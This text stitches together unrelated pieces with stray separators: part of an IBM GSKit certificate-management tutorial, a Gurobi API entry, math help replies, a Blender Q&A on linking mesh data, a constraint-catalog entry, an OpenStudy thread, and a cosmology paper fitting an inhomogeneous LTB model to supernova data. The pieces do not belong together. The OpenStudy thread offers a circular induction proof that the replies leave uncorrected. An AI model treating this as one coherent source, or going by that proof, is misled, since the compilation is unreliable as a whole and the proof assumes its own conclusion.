This example uses a third-party CA root certificate that is in a binary format. If the certificate is in an ASCII format, use the -format ascii option. The -db parameter specifies the name of the key database to import the third-party CA root certificate into. The -label parameter specifies the label to use for the third-party CA root certificate inside the key database file. The -file parameter specifies the file that contains the third-party CA root certificate.
### Requesting a certificate using a signing request
In this scenario, GSKit creates a certificate request, the third-party CA signs the certificate in the request, and GSKit imports the signed certificate into the server key database.
1. Generate a server certificate request using the server's key database file:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "Some CA signed certificate" -dn "CN=host.mycompany.com,O=company,C=country" -file cert_request.arm
The -db parameter specifies the name of the server's key database file. The -label parameter specifies a label to refer to the newly created certificate in the key database file. The -dn parameter specifies the distinguished name to be used on the server's certificate. The -file parameter specifies the file to contain the exported certificate signing request. The CN parameter specifies the DNS name of your server. This is necessary for an SSL client to validate the certificate.
You can also request SAN extension by using -san_dnsname or -san_ipaddr options (not supported in version 7). For example:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "Some CA signed certificate" -dn "CN=host.mycompany.com,OU=unit,O=company" -san_dnsname "host1.mycompany.com,host2.mycompany.com" -san_ipaddr "10.10.10.1,10.10.10.2" -file cert_request.arm
2. Send the certificate request (that is, the cert_request.arm file) to the CA. The process for submitting a certificate signing request varies among CA companies. Often the signing request can be submitted using a web form.
3. The CA then returns the signed certificate. In this scenario, the assumption is that the signed certificate is in a file that is called cert_signed.arm and is in an ASCII format.
4. Receive the signed certificate into the server's key database file and set it as the default for communicating with clients:
gsk8capicmd -cert -receive -db server.kdb -stashed -file cert_signed.arm -default_cert yes
The -db parameter specifies the name of the server's key database file. The -file parameter specifies the name of the file that contains the signed certificate.
### Requesting a certificate without a signing request
Some Certificate Authorities do not accept signing request files. Instead, they generate the signing request internally on behalf of the requesting server and then sign it as one transaction. The CA then returns to the server two files, one containing the private key for the server to use and one containing the signed server certificate. In this example, the assumption of the two files is as follows:
• host.mycompany.com.crt: This is the file that contains the signed server certificate.
• host.mycompany.com.key: This is the file that contains the server's private key.
These files must be converted to an industry-standard format called PKCS12 before they can be imported into a key database.
1. Use OpenSSL to convert the two files into a PKCS12 file as follows:
openssl pkcs12 -export -in host.mycompany.com.crt -inkey host.mycompany.com.key -out host.mycompany.com.p12 -name "CA signed"
The OpenSSL command prompts you to enter a password. This password is only used temporarily so it can be any arbitrary password. In this example, the password is set to abc. The -in parameter specifies the file that contains the signed server certificate. The -inkey parameter specifies the file that contains the server's private key.
2. Import the certificate from the PKCS12 file to the server's key database file as follows:
gsk8capicmd -cert -import -db host.mycompany.com.p12 -pw abc -target server.kdb
The -db parameter specifies the name of the PKCS12 file. The -pw parameter specifies the password that protects the PKCS12 file. The -target parameter specifies the name of the server's key database file. You are prompted for the password that protects the target database file.
3. Make the imported certificate the default certificate to use for communications as follows:
gsk8capicmd -cert -setdefault -db server.kdb -stashed -label "CA signed"
The -db parameter specifies the name of the server's key database file. The -label parameter specifies a label of the imported certificate.
## GSKit security considerations
### Protecting private keys
If an attacker obtains access to the private keys, the associated certificates can't be trusted, compromising the servers that depend on them. You can help protect the key database file by:
• Protecting the stored password file (the .sth file) using the file system's security mechanisms if you use the GSKit stashed password feature. For example, you can set the file permissions to restrict access to this file to certain users.
• Restricting file system access to the key database file (the .kdb file) so that it is only readable by the users that run an application that uses the key database.
### Verifying the identity of certificate requesters
If you manage your own Certificate Authority, you must ensure that any certificate signing request comes from an identity that is authorized to access the resource the requested certificate is for. The trustworthiness of certificates issued by the Certificate Authority is only as good as the process used to verify the identity of the requester.
## Tips and tricks
### Listing key database contents
To get a short list (labels only) of all certificates in a key database, use the following command:
gsk8capicmd -cert -list -db server.kdb -stashed
The -db parameter specifies the name of the key database file.
To get detailed information about a particular certificate, use the following command:
gsk8capicmd -cert -details -db server.kdb -stashed -label "My certificate"
In this command, the -db parameter specifies the name of the key database file. The -label parameter specifies the label of the certificate in the database.
### Switching between certificates
A server's key database file can have multiple server certificates in it. However, only one certificate, which is known as the default certificate, can be used by the server at a time. You can change which certificate is the default certificate using the following command:
gsk8capicmd -cert -setdefault -db server.kdb -stashed -label <certificate's label>
In this command, the -db parameter specifies the name of the server's key database file. The -label parameter specifies the label of the certificate to make the default.
Because client key database files have only the server certificates in them and no private keys, none of the certificates in a client key database can be set as the default.
### Verifying the server certificate
#### Verifying the server certificate using a browser
If your GSKit key database file is being used to implement SSL on a web server, connect to the server with a web browser using an https://server:port syntax. You may get a security warning if your browser doesn't have the signing CA certificate or the self-signed certificate that is used by the server. But most browsers let you display information about the certificate currently being used by the server.
#### Verifying the server certificate using OpenSSL
1. Connect to the server and display its certificate using OpenSSL as follows:
openssl s_client -connect server:port
The -connect parameter specifies the server domain name and the port that the server is listening on.
2. From the command's output, copy everything from "BEGIN CERTIFICATE" to "END CERTIFICATE," including those two lines. In this example, assume the command output is copied to a file called server.cert.
3. Use OpenSSL to display the certificate as follows:
openssl x509 -in server.cert -noout -text
The -in parameter specifies the name of the file that contains the certificate copied from the s_client output.
If you add the -showcerts option in step 1, you get the full certificate chain. You can repeat steps 2 and 3 for each certificate in the chain to analyze them.
## Resources
### Get products and technologies
• OpenSSL is an open source project for implementing the SSL/TLS protocols and has certificate management tools that are referenced in this tutorial.
## Dig deeper into Security on developerWorks
• ### Bluemix Developers Community
Get samples, articles, product docs, and community resources to help build, deploy, and manage your cloud apps.
• ### developerWorks Labs
Experiment with new directions in software development.
• ### DevOps Services
Software development in the cloud. Register today to create a project.
• ### IBM evaluation software
Evaluate IBM software and solutions, and transform challenges into opportunities.
ArticleTitle=Managing certificates with IBM GSKit
publish-date=11062012 |
# GRBModel.GetTuneResult()
Use this method to retrieve the results of a previous Tune call. Calling this method with argument n causes tuned parameter set n to be copied into the model. Parameter sets are stored in order of decreasing quality, with parameter set 0 being the best. The number of available sets is stored in attribute TuneResultCount.
Once you have retrieved a tuning result, you can call optimize to use these parameter settings to optimize the model, or write to write the changed parameters to a .prm file.
Please refer to the parameter tuning section for details on the tuning tool.
void GetTuneResult ( int n )
n: The index of the tuning result to retrieve. The best result is available as index 0. The number of stored results is available in attribute TuneResultCount. |
For your first one, which set of lines are you referring to? The two yellow line segments are the same because they are both radii of the circle, and the two white segments are the same because, as Professor Loh said, you can apply the Pythagorean Theorem!
Similar triangles are very different from congruent triangles. Two triangles are congruent if they are exactly the same! (Though, it still counts if it's "flipped"). The important thing about congruent triangles is that they share the exact same side lengths and angles. This is very useful: If we can figure out that two triangles are congruent, then we may be able to deduce that two angles are the same, or perhaps that two side lengths are the same!
On the other hand, similar triangles don't have as much in common as congruent triangles. Similar triangles only need the same angles. A good way to think about what triangles count as similar is this: If you draw a triangle, and draw the "same" triangle but 3 times smaller, you will have two triangles that both "look" the same, but they aren't congruent because the second triangle has sides that are three times smaller. But, they will actually be similar!
Finally let's get to your last question, an algebra question! Why is it that:
$$\sqrt{2} \times \sqrt{4} = 2 \times \sqrt{2}?$$
Try not to overthink this! We know that $$\sqrt{4} = 2$$, so $$\sqrt{2} \times \sqrt{4} = \sqrt{2} \times 2 = 2 \times \sqrt{2}$$.
Though, in the future, dealing with radicals might be tricky! For example, how might you simplify this?
$$\sqrt{8} \times \sqrt{12}$$
Here's one approach: First we can combine the radicals together:
$$\sqrt{8} \times \sqrt{12} = \sqrt{8 \times 12}$$
Now, look for perfect squares you can separate it into, so you can take them out!
$$\sqrt{8 \times 12} = \sqrt{4 \times 2 \times 12} = \sqrt{4 \times 4 \times 6} = \sqrt{4} \times \sqrt{4} \times \sqrt{6} = \boxed{4\sqrt{6}}$$ |
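If you want to double-check this kind of simplification numerically, a quick sketch in Python (using only the standard math module) confirms it:

```python
import math

# sqrt(8) * sqrt(12) should equal 4 * sqrt(6): both are sqrt(96)
lhs = math.sqrt(8) * math.sqrt(12)
rhs = 4 * math.sqrt(6)
assert math.isclose(lhs, rhs)

# and the earlier identity: sqrt(2) * sqrt(4) == 2 * sqrt(2)
assert math.isclose(math.sqrt(2) * math.sqrt(4), 2 * math.sqrt(2))
```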
# Linking object data without changing rotation?
I have multiple objects that I would like to all use the same mesh but maintain their individual rotation positions. As it is, when I link their object data, all the objects rotate to the same position as the object I'm linking the data from.
Is there any way do this without having to go around and manually re-rotate all the linked objects back to their original rotation positions?
Thanks!
• "when I link their object data, all the objects rotate to the same position" No they don't; what happens is that your current objects have no rotation transformations or have their rotations applied, so when you link object data they inherit the other object's shape, giving the impression of rotating themselves. The sad part is there is no easy way to fix this other than manually realigning them one by one. May 9, 2017 at 18:27
• @DuarteFarrajotaRamos - Thanks. I was afraid this might be the case but I was hoping someone had a way of doing it. May 9, 2017 at 19:13
• I am aware of the problem, but I don't know of any way to fix this easily/quickly. Is this data imported from another application? Your best bet would probably be using another import file format that supports instancing and/or transforms. I am blindly guessing this was imported from OBJ; maybe try FBX, which correctly interprets clones. May 9, 2017 at 23:45
• I don't know if this works for you or if it is "too manual", but you could perhaps previously create a "marker" for each object that you need to "remember" original transforms later. It could be anything from an object duplicate (maybe in another layer) to an empty. Then after you link the desired object data, if they lose their original transform, you can always make them use a "copy transform" constraint to get their original transform settings, then apply that using "apply > visual transforms". May 10, 2017 at 12:25
The best way is to create a Collection with the object to distribute, then add Collection Instances (Shift+A > Collection Instance) to the scene and place them randomly; I suggest Proportional Editing (O).
In this set-up, if you modify the original object, the other ones change accordingly, and since each is a Collection Instance, it retains its transformation data (which cannot be accidentally applied).
Good Luck!
I ran into this problem today and found a solution. It requires a few manual steps, but it is not too bad. I have 6 objects with different orientations whose mesh data I want to link to one Reference Object.
First select all the objects to be linked & press CTRL+A to apply Rotation to all objects to be linked
Set Object Transform Option to Affects Origins
Make sure the Face Orientation Normals are correct, everything should be blue. If something is red, fix it by going into Edit Mode and press A to select all faces and press SHIFT+N to recalculate normals outside.
Set Snapping Mode to Face and set the other settings as shown below
STEPS FOR EACH OBJECT TO BE LINKED:
Then choose any surface you want your origin to orient to; I chose the circular top of the cylinder. Drag the origin by pressing G and snap it anywhere on that surface by holding CTRL while moving across the surface normal. It doesn't need to be perfectly centered because we will snap the origin perfectly in the center in the next step. The Z-axis will align perpendicularly outwards of that snapped surface.
Press TAB to go to Edit Mode and click select the chosen surface normal you snapped the origin onto and press SHIFT+S > Cursor to Selected
Then press TAB again to go back to Object Mode and press SHIFT+S > Selection to Cursor
Now you have the origin nicely centered and aligned with the objects local orientation. Do these steps for every object including the Reference Object you want to link to so that all objects have the same orientation.
Then you can select all objects to be linked and SHIFT select the Reference Object last to make it the Active Selection and press CTRL+L > Link Object Data
Create duplicates, rotate them as you wish, then simply substitute the original mesh in the mesh data menu, creating multiple instances. Transformation is not affected.
• Hi, thanks for the post. This site is not a regular forum, answers should be substantial, stand on their own, and thoroughly explain the solution and procedure. One liners and short tips rarely make for a good answer. If you can, please edit your post and provide some more details about the workflow and how it works. Perhaps add a few images illustrating some steps and final result. See How to write a good answer? Jul 8 at 21:32 |
# How do you solve the equation x^2-3x-7=0 by completing the square?
Mar 3, 2018
$x \approx 4.54, -1.54$
#### Explanation:
${x}^{2} - 3 x - 7 = 0$
${x}^{2} - \left(2 \cdot \left(\frac{3}{2}\right) \cdot x\right) = 7$
Adding ${\left(\frac{3}{2}\right)}^{2}$ to both sides,
$${x}^{2} - \left(2 \cdot \frac{3}{2} \cdot x\right) + {\left(\frac{3}{2}\right)}^{2} = 7 + {\left(\frac{3}{2}\right)}^{2} = \frac{37}{4}$$
${\left(x - \left(\frac{3}{2}\right)\right)}^{2} = {\left(\sqrt{\frac{37}{4}}\right)}^{2}$
$x = \pm \sqrt{\frac{37}{4}} + \left(\frac{3}{2}\right)$
$x = \frac{3 \pm \sqrt{37}}{2} \approx 4.54, -1.54$
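The exact roots coming out of the completed square are $x = \frac{3 \pm \sqrt{37}}{2}$; a short numeric check in Python (a sketch) confirms the rounded values:

```python
import math

# roots of x^2 - 3x - 7 = 0 from the completed square:
# (x - 3/2)^2 = 37/4  =>  x = 3/2 ± sqrt(37)/2
roots = [3/2 + math.sqrt(37)/2, 3/2 - math.sqrt(37)/2]

# each root should satisfy the original equation
for x in roots:
    assert math.isclose(x**2 - 3*x - 7, 0, abs_tol=1e-12)

# rounded to two decimals, these are the quoted answers
assert [round(x, 2) for x in roots] == [4.54, -1.54]
```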
## 5.290. size_max_seq_alldifferent
Origin
N. Beldiceanu
Constraint
size_max_seq_alldifferent(SIZE, VARIABLES)
Synonyms
size_maximal_sequence_alldiff, size_maximal_sequence_alldistinct, size_maximal_sequence_alldifferent.
Arguments
SIZE: dvar
VARIABLES: collection(var-dvar)
Restrictions
SIZE ≥ 0
SIZE ≤ |VARIABLES|
required(VARIABLES, var)
Purpose
SIZE is the size of the maximal sequence (among all possible sequences of consecutive variables of the collection VARIABLES) for which the alldifferent constraint holds.
Example
(4, ⟨var-2, var-2, var-4, var-5, var-2, var-7, var-4⟩)
The size_max_seq_alldifferent constraint holds since the constraint alldifferent(⟨var-4, var-5, var-2, var-7⟩) holds and since the following three constraints do not hold: alldifferent(⟨var-2, var-2, var-4, var-5, var-2⟩), alldifferent(⟨var-2, var-4, var-5, var-2, var-7⟩) and alldifferent(⟨var-4, var-5, var-2, var-7, var-4⟩).
Symmetry
One and the same constant can be added to the var attribute of all items of VARIABLES.
Keywords
Arc input(s)
VARIABLES
Arc generator
PATH_N ↦ collection
Arc arity
$*$
Arc constraint(s)
alldifferent(collection)
Graph property(ies)
NARC = SIZE
Graph model
Note that this is an example of global constraint where the arc constraints do not have the same arity. However they correspond to the same type of constraint. |
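The constraint can also be checked procedurally: among all sequences of consecutive variables, find the longest one whose values are pairwise distinct. A sketch in Python (the function name is ours, not part of the catalog) using a standard sliding window:

```python
def size_max_seq_alldifferent(variables):
    """Length of the longest run of consecutive entries with pairwise-distinct values."""
    best = start = 0
    last_seen = {}  # value -> most recent index where it appeared
    for i, v in enumerate(variables):
        # shrink the window so it no longer contains an earlier copy of v
        if v in last_seen and last_seen[v] >= start:
            start = last_seen[v] + 1
        last_seen[v] = i
        best = max(best, i - start + 1)
    return best

# the catalog example: SIZE = 4, achieved by the subsequence <4, 5, 2, 7>
assert size_max_seq_alldifferent([2, 2, 4, 5, 2, 7, 4]) == 4
```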
# Point O
Author: daniyar
Problem has been solved: 98 times
Let $O$ be an arbitrary point on the plane. Points $A$, $B$, and $C$ are chosen in the same plane such that $AO=BO=CO+8=15$ and the area of triangle $ABC$ is maximized. What is the length of the shortest side of triangle $ABC$?
## anonymous 5 years ago Use the Triangle Inequality and Mathematical Induction to show that$\left|\sum_{k=1}^{n}a_k\right|\leq\sum_{k=1}^{n}|a_k|.$Well, from the Triangle Inequality, we know that$\left|\sum_{k=1}^{n}a_k\right|=|a_1+a_2+...+a_n|\leq|a_1|+|a_2|+...+|a_n|=\sum_{k=1}^{n}|a_k|,$and by Mathematical Induction, we see that$\left|\sum_{i=1}^{1}a_i\right|=|a_1|=\sum_{i=1}^{1}|a_i|,$assume it's true for $$k$$, and see that$\left|\sum_{i=1}^{k+1}a_i\right|=|a_1+a_2+...+a_{k+1}|\leq|a_1|+|a_2|+...+|a_{k+1}|=\sum_{i=1}^{k+1}|a_i|,$as required.
• This Question is Closed
1. anonymous
Does this seem sound?
2. anonymous
o..m..g..
3. LifeIsADangerousGame
I agree with Hershey_Kisses...
4. anonymous
holy cow! that looks like.....holy cow that unbearable!
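For reference, the inductive step is usually written so that it uses only the two-term triangle inequality together with the induction hypothesis, rather than the full $n$-term inequality being proved. A sketch:

```latex
\left|\sum_{i=1}^{k+1} a_i\right|
  = \left|\left(\sum_{i=1}^{k} a_i\right) + a_{k+1}\right|
  \le \left|\sum_{i=1}^{k} a_i\right| + |a_{k+1}|
  \le \sum_{i=1}^{k} |a_i| + |a_{k+1}|
  = \sum_{i=1}^{k+1} |a_i|,
```

where the first inequality is the two-term triangle inequality and the second is the induction hypothesis.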
Research article
Inhomogeneous matter distribution and supernovae
Version 1 Released on 20 May 2016 under Creative Commons Attribution 4.0 International License
1. ICRANet
Abstract
This work investigates a simple inhomogeneous cosmological model within the Lemaître-Tolman-Bondi (LTB) metric. The mass-scale function of the LTB model is taken to be $M(r) \propto r^d$ and would correspond to a fractal distribution for $0<d<3$. The luminosity distance for this model is computed and then compared to supernovae data. Unlike LTB models, which in the most general case have two free functions, our model has only two free parameters, just like the flat standard model of cosmology. The best fit obtained is a matter distribution with an exponent of $d=3.44$, revealing that supernovae data do not favor those fractal models.
Introduction
The discovery that the observed peak luminosity of type IA supernovae (SNe IA) was smaller than the one implied by a $\Lambda=0$ Friedmann-Lemaître-Robertson-Walker (FLRW) model led most of the scientific community to believe that our Universe is expanding at an increasing rate. To drive this expansion, an unknown perfect fluid $\Lambda$, dubbed dark energy, has been introduced by hand. Indeed, a detailed fitting procedure leads to the conclusion that the best-fit model is a flat FLRW metric filled with dark energy ($68\%$) and pressureless matter ($32\%$). This is called the concordance or $\Lambda$CDM model and is widely accepted and taught as the best candidate so far to describe our Universe. The very assumption of the $\Lambda$CDM model is that the geometry of our Universe is described by spatially homogeneous and isotropic spacetimes (called FLRW). Whereas statistical isotropy about our position has been established with remarkable precision by observations of the cosmic microwave background (CMB) spectrum,[1] statistical homogeneity on large scales is hard to probe, mainly because it is hard to distinguish a temporal from a spatial evolution on the past light cone (two good reviews: Refs. [2,3]). This motivates investigating more general spacetimes where the very assumption of statistical homogeneity is relaxed.
In the framework of Einstein's general relativity, a natural way to create an apparent acceleration is to introduce a large-scale inhomogeneous matter distribution. This leads to many controversial philosophical debates (see e.g. Ref. [4]). It has been shown that the Lemaître-Tolman-Bondi (LTB) [5-7] metric can successfully fit the dimming of the SNe IA by modeling radial inhomogeneities in a suitable way.[8,9] The fit of mass profiles to various datasets, including SNe, was performed for instance in Ref. [10]. The deduced acceleration of the expansion of the Universe induced by this unknown dark energy would be nothing but a mirage due to light traveling through an inhomogeneous medium, as explained e.g. in Ref. [11]. However, one caveat to these inhomogeneous LTB models is that, under very mild assumptions on the regularity and asymptotic behavior of the free functions of the LTB model, any pair of sets of conjugate observational data (for instance the pairs {angular diameter distance, mass density in redshift space} or {angular diameter distance, expansion rate}) can be reproduced [12,13]. Proposing an alternative to the FLRW model which has so much freedom that it can fit any data set seems problematic. Hence physical criteria are required to constrain the LTB models.
In this work, a parametric LTB model is considered and a data analysis is performed with the SNe IA data of Union2.1.[14] The result is that the data favor the flat FLRW model, but the parametric LTB model also fits the data reasonably well. We argue that this model is interesting for two reasons: on the one hand, it shows that a parametric LTB model can indeed fit SNe IA data without dark energy even though it has much less freedom than the fully general LTB model; on the other hand, it opens the road to broader and more robust data analyses checking whether these classes of models can explain all the diverse cosmological data (CMB anisotropies and polarization, integrated Sachs-Wolfe effect, light element abundances, baryon acoustic oscillations, galaxy surveys...). The paper is organized as follows: in section 2, we discuss some of the theoretical and philosophical challenges for homogeneous universes. In section 3, we describe the main ingredients of our parametric LTB model; the final goal of that section is to obtain an expression for the luminosity distance in the parametric LTB model. In section 4, a data analysis is performed to determine whether this model can also account for the observed SNe IA data. A connection to fractal cosmologies is proposed in section 5. Some concluding remarks and perspectives are drawn in section 6.
Homogeneity or inhomogeneity?
In this section, we posit some theoretical and philosophical thoughts on the choice of the FLRW metric to describe our Universe.
The observations of the CMB and galaxy surveys advocate for a universe statistically isotropic around us. To these observations, one usually adds a principle to determine which class of cosmological solutions describes our Universe. The cosmological principle states that the Universe is spatially statistically homogeneous and isotropic. The Copernican principle is weaker and states that no observer has a peculiar position in the Universe. Combined with an isotropy hypothesis, the Copernican principle implies the cosmological principle. The cosmological principle is very ambitious because it conjectures on the geometry of the (possibly) infinite Universe, whereas the Copernican principle applies only to the observable universe. Even though "principle" is an appealing wording, it reflects nothing but a confession of lack of knowledge of the matter distribution on large scales. Indeed, homogeneity cannot be directly observed in the galaxy distribution or in the CMB, since we observe on the past light cone and not on spatial hypersurfaces. An interesting study might be to consider this lack of knowledge in the context of information theory and try to quantify how much information one can extract with idealized measurements, and whether this permits drawing any cosmological conclusion. Note [11] that FLRW models can only be called Copernican if one considers our spatial position. Considering FLRW models from a fully relativistic point of view, that is, considering the observer in the four-dimensional spacetime, the model cannot be called Copernican: whereas our position in space is not special, our temporal location is. Within the $\Lambda$CDM model, this caveat is called the coincidence problem.
The FLRW metric is the cosmological solution corresponding to a homogeneous and isotropic spacetime. Of course, homogeneity and isotropy are valid only up to some scale, called the homogeneity and isotropy scale. From an epistemological point of view, it is unsatisfactory to have a model for a universe which is homogeneous but does not have any built-in prescription for its scale of homogeneity. A common order of magnitude for the homogeneity scale is hundreds of megaparsecs, but observations of larger and larger structures have been reported in the past decades (Ref. [15] for a recent example). Many people see them as Black Swan events, but they could be more fundamental. It is furthermore interesting to note that the Hubble law starts to hold where the proper velocity of a galaxy can be neglected, i.e. around 10 Mpc, whereas the homogeneity scale is known to be much larger ($\sim 100$ Mpc).
It has also been questioned whether the homogeneity assumption should be applied to the Einstein tensor or to the metric itself.[16] It is indeed known that in the general case $<G_{\mu \nu}(g_{\mu \nu})> \neq G_{\mu \nu}(<g_{\mu \nu}>)$, where $<...>$ denotes a spatial average. This idea is really hard to implement because Einstein's equations are no longer tensor equations after the averaging procedure (changing from covariant to contravariant indices alters the equations). Then only tensors of rank 0, that is scalars, would have a well-behaved average [17]. The consequences of this approach are still unclear [18].
Describing our Universe with a FLRW spacetime does not tackle the so-called "Ricci-Weyl" problem. The usual FLRW geometry is characterized by a vanishing Weyl tensor and a non-zero Ricci tensor, whereas in reality light is believed to travel mostly in vacuum, where the Ricci tensor vanishes and the Weyl tensor is non-zero (see e.g. Ref. [19] and references therein for more details). The parametric LTB models described in the next sections would be a possible extension of the Swiss-cheese models described in Ref. [19]. They would break the continuous limit and should reproduce more accurately the actual large-scale structure of our Universe (with voids and filaments).
The problems described previously mainly gravitate around the homogeneity assumption. Our current standard model of cosmology has many puzzling features: some fine-tuning problems [20] and the cosmological constant problem.[21] Inhomogeneous spacetimes are less studied, so their drawbacks are less known, but they could give clues on the above-mentioned problems.
LTB model:
The goal of this section is to derive an expression for the luminosity distance in a LTB model. To do so, we first present some generalities about the LTB model and then specify the class of models we focus on. To connect to observations, distances in LTB spacetimes are presented, and the final result for the luminosity distance is shown in Eq. (\ref{eq:dl}).
LTB model: generalities
The model describes a spherically symmetric dust distribution of matter. In coordinates comoving with the dust and in the synchronous time gauge, the line element of the LTB metric is given by: $$\label{metric} ds^2=dt^2-\frac{R'^2(r,t)}{f^2(r)}dr^2-R^2(r,t) d\Omega^2.$$ Our convention for derivatives is that a prime denotes a derivative with respect to the radial coordinate $r$ and a dot a derivative with respect to cosmological time. $R(r,t)$ is the areal radius function, a generalization of the scale factor of FLRW spacetimes. It also has a geometrical meaning, as it can be interpreted as the angular distance, as we will discuss in section 3.2. $f(r)$ is the energy per unit mass in a comoving sphere and also represents a measure of the local curvature.
The time evolution of the areal radius function is given by the Einstein equation, which reads: $$\label{EOM} \frac{\dot{R}^2(r,t)}{2} - \frac{M(r)}{R(r,t)}= \frac{f(r)^2-1}{2},$$ where $M(r)$ is a second free function. After integrating (\ref{EOM}), one finds the third free function of the LTB model, namely $t_B(r)$, which is the bang time for worldlines at radius $r$. We will consider only a small class of LTB solutions. First, the equations of the LTB model (\ref{metric}, \ref{EOM}) are invariant under the change of radial coordinate $r \rightarrow r + g(r)$, where $g(r)$ is an arbitrary function. This gives the possibility to choose one of the free functions of the LTB model arbitrarily. The assumptions for these solutions are:
• The gauge freedom explained above allows us to choose one unique big-bang : $t_B(r)$ constant.
• We consider parabolic LTB solutions so that the geometry is flat: $f(r)=1$
• The free function $M(r)$ can be interpreted as the cumulative mass inside a sphere of comoving size $r$ [7]. At this point, it is worth noting that an Einstein-de Sitter universe (flat, matter-only FLRW universe) is recovered for $M(r)=M_0 r^3$.
We choose the form of the free function $M(r)$ as follows: $$\label{condif} M(r)=\mathcal{M}_g N(r)= \mathcal{M}_g \sigma r^{d},$$ where $\mathcal{M}_g$ is the mass of a galaxy. This choice is our prescription to restrain the free function of the LTB models. $(\sigma, d)$ are two free parameters which will be constrained by supernovae data. In section 5, a connection to fractal cosmologies will be described.
Observational distance
We will follow Ref. [22] for the definition of distances; more information and references can be found in that piece of work. Ellis [23] gave a definition of the angular distance which, applied to the LTB metric, gives $d_A=R$; one furthermore applies Etherington's reciprocity theorem [24]: $$\label{Th} d_L=(1+z)^2 d_A,$$ which is true for a general spacetime provided that source and observer are connected through null geodesics. Since one considers a small class of parametric LTB models, an analytic solution of (\ref{EOM}) can be found: $$\label{solu} R(r,t)= \left(\frac{9M(r)}{2}\right)^{1/3} (t_B+t)^{2/3}.$$ Assuming a single radial geodesic [12], an analytical expression for the redshift as a function of the radial coordinate has been found in Ref. [22]: $$\label{SNR} 1+z(r) = \frac{t_B^{2/3}}{(t_B+t)^{2/3}}=\frac{t_B^{2/3}}{(t_B-r)^{2/3}}.$$ Using Eqs. (\ref{condif}), (\ref{Th}), (\ref{solu}) and (\ref{SNR}), it is possible to derive an expression for the parametric LTB luminosity distance: $$\label{eq:dl} d_L=\left(\frac{9\sigma M_g}{2}\right)^{1/3} t_B^{\frac{d+2}{3}} \frac{\left((1+z)^{3/2}-1\right)^{d/3}}{(1+z)^{d/2-1}}.$$ This is the formula we will confront with its FLRW counterpart; it is only a function of the two parameters characterizing the matter distribution ($\sigma$, $d$). We will work with the following units: the unit of mass is $2.09\times 10^{22} M_{\odot}$, the time unit is $3.26\times 10^9$ years, and distances are given in Gpc. The big-bang time will be taken equal to 4.3 for the data analysis.
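Equation (\ref{eq:dl}) is straightforward to evaluate numerically. The following sketch in Python uses the best-fit values $\sigma^{1/3}=0.192$, $d=3.44$ and $t_B=4.3$ quoted in the text; the galaxy mass $\mathcal{M}_g$ is set to 1 in the stated units purely as an illustrative placeholder:

```python
def d_l_ltb(z, sigma, d, m_g=1.0, t_b=4.3):
    """Luminosity distance of the parametric LTB model, Eq. (dl).

    Units follow the text: masses in 2.09e22 solar masses,
    times in 3.26e9 yr, distances in Gpc. m_g = 1.0 is an
    illustrative placeholder, not a value from the paper.
    """
    prefactor = (9 * sigma * m_g / 2) ** (1 / 3) * t_b ** ((d + 2) / 3)
    return prefactor * ((1 + z) ** 1.5 - 1) ** (d / 3) / (1 + z) ** (d / 2 - 1)

# basic sanity checks: zero distance at z = 0, monotonically increasing in z
zs = [0.0, 0.1, 0.5, 1.0, 1.5]
ds = [d_l_ltb(z, sigma=0.192**3, d=3.44) for z in zs]
assert ds[0] == 0.0
assert all(a < b for a, b in zip(ds, ds[1:]))
```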
Supernovae data analysis
In this section, we fit the Union2.1 compilation released by the Supernova Cosmology Project [14]. It is composed of 580 uniformly analyzed SNe IA and is currently the largest and most recent publicly available sample of standardized SNe IA. The redshift range extends up to $z=1.5$.
| model | parameter 1 | parameter 2 | $\chi^2$ |
|---|---|---|---|
| flat FLRW | $\Omega_M=0.30\pm 0.03$ | $h=0.704 \pm 0.006$ | $538$ |
| parametric LTB | $d=3.44 \pm 0.03$ | $\sigma^{1/3}=0.192 \pm 0.002$ | $973$ |
A $\chi^2$ fit has been performed; it consists in minimizing the $\chi^2$ defined as: $$\chi^2(\text{parameter 1},\text{parameter 2}) \equiv \sum_{i=1}^{580} \left[ \frac{d_L(i)-d_L(\text{parameter 1},\text{parameter 2})}{\Delta d_L(i)} \right]^2$$ where $\Delta d_L(i)$ is the observational error bar for each data point indexed by $i$. The results are presented in the table together with the 95% confidence intervals.
Figure 1. Best-fit curves for the FLRW model (red, upper curve) and the parametric LTB model (orange, lower curve); the quantitative results are given in the table.
Figure 2. Residual errors for the FLRW model.
Figure 3. Residual errors for the parametric LTB model.
Figure 4. 1, 3, 5 $\sigma$ confidence limits for the parametric LTB model.
$\Omega_M$ and $h$ are the two free parameters of the flat FLRW model. Recall that $\Omega_{\Lambda}$ is related to $\Omega_M$ by $\Omega_{\Lambda}+\Omega_M=1$, and $h$ is related to the Hubble constant via $H_0 \equiv 100 h \frac{\text{km}}{\text{Mpc s}}$. The Hubble diagram and the associated residuals are plotted in Fig. 1. Our results for the FLRW case are in agreement with the current literature on the cosmological parameters [1], although the uncertainties are larger. Interestingly, the parametric LTB model gives results which are not compatible with FLRW, in the sense that to recover the FLRW model, $d$ has to be exactly 3. Looking at the confidence-interval ellipses displayed in Fig. 4, the value $d=3$ is ruled out by more than $5\sigma$. This illustrates that even though the data are not better fitted by the parametric LTB model, it still does better than an Einstein-de Sitter model (which would correspond to $\Omega_M=1$).
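For reference, the flat-FLRW luminosity distance used in this comparison follows from $\Omega_\Lambda=1-\Omega_M$ and a one-dimensional integral over the Hubble function. A minimal numerical sketch, assuming the standard flat-FLRW formula $d_L=(1+z)\,\frac{c}{H_0}\int_0^z dz'/E(z')$ with $E(z)=\sqrt{\Omega_M(1+z)^3+\Omega_\Lambda}$ (the excerpt does not spell it out):

```python
import numpy as np

def d_L_flat_FLRW(z, Omega_M=0.30, h=0.704):
    """Flat-FLRW luminosity distance in Gpc, best-fit parameters as defaults."""
    c = 299792.458            # speed of light, km/s
    H0 = 100.0 * h            # Hubble constant, km/s/Mpc
    Omega_L = 1.0 - Omega_M
    zp = np.linspace(0.0, z, 2001)
    E = np.sqrt(Omega_M * (1.0 + zp) ** 3 + Omega_L)
    # Trapezoidal rule for the comoving distance (Mpc).
    D_C = (c / H0) * np.sum(0.5 * (1.0 / E[1:] + 1.0 / E[:-1]) * np.diff(zp))
    return (1.0 + z) * D_C / 1000.0  # Mpc -> Gpc

print(d_L_flat_FLRW(1.0))  # roughly 6.6 Gpc for the best-fit parameters
```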
